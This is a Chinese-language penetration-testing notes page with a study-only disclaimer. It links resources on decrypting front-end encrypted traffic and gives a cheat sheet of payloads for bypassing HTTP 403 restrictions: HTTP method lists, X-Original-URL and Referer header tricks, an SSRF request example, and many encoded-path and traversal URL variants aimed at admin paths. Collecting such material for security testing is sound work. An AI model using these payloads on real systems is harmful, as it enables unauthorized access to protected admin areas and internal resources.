前端攻防

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

前端解密

相关文章

• 对登录中账号密码进行加密之后再传输的爆破的思路和方式
• 浅析前端加密后数据包的修改方法
• 浅谈web安全之前端加密

相关案例

• H5页面漏洞挖掘之路-加密篇

相关工具

• Ebryx/AES-Killer - 可即时解密移动应用程序的 AES 加密流量的 Burp 插件

绕过访问

相关工具

• iamj0ker/bypass-403 - 一个用来绕过403报错的简单脚本

Tips

• protocol based bypass

  http://web.com/admin    # ===> 403
  https://web.com/admin   # ===> 200
  

• method based bypass

  OPTIONS
  GET
  HEAD
  POST
  PUT
  DELETE
  TRACE
  TRACK
  CONNECT
  PROPFIND
  PROPPATCH
  MKCOL
  COPY
  MOVE
  LOCK
  UNLOCK
  VERSION-CONTROL
  REPORT
  CHECKOUT
  CHECKIN
  UNCHECKOUT
  MKWORKSPACE
  UPDATE
  LABEL
  MERGE
  BASELINE-CONTROL
  MKACTIVITY
  ORDERPATCH
  ACL
  PATCH
  SEARCH
  ARBITRARY
  

• HTTP Header based bypass

  GET /admin HTTP/1.1
  Host: web.com   # ===> 403
  
  GET /anything HTTP/1.1
  Host: web.com
  X-Original-URL: /admin  # ===> 200
  
  GET /anything HTTP/1.1
  Host: web.com
  Referer: https://web.com/admin  # ===> 200
  
  GET https://qq.com HTTP/1.1
  Host: web.com   # ===> SSRF
  

• url character/parameter bypass

  /admin/panel    # ===> 403
  /admin/monitor  # ===> 200
  
  /admin/monitor/;panel   # ===> 302
  

  web.com/admin   # ===> 403
  
  web.com/ADMIN       # ===> 200
  web.com/admin/      # ===> 200
  web.com/admin/.     # ===> 200
  web.com//admin//    # ===> 200
  web.com/./admin/./  # ===> 200
  web.com/./admin/..  # ===> 200
  web.com/%2f/admin/  # ===> 200
  web.com/admin.json  # ===> 200(ruby)
  
  web.com/%2e/admin   # ===> 200
  web.com/%252e/admin # ===> 200
  web.com/%ef%bc%8fadmin  # ===> 200
  
  web.com/admin       # ===> 302
  web.com/../admin    # ===> 200
  web.com/test/admin  # ===> 200
  web.com/admin..;/   # ===> 200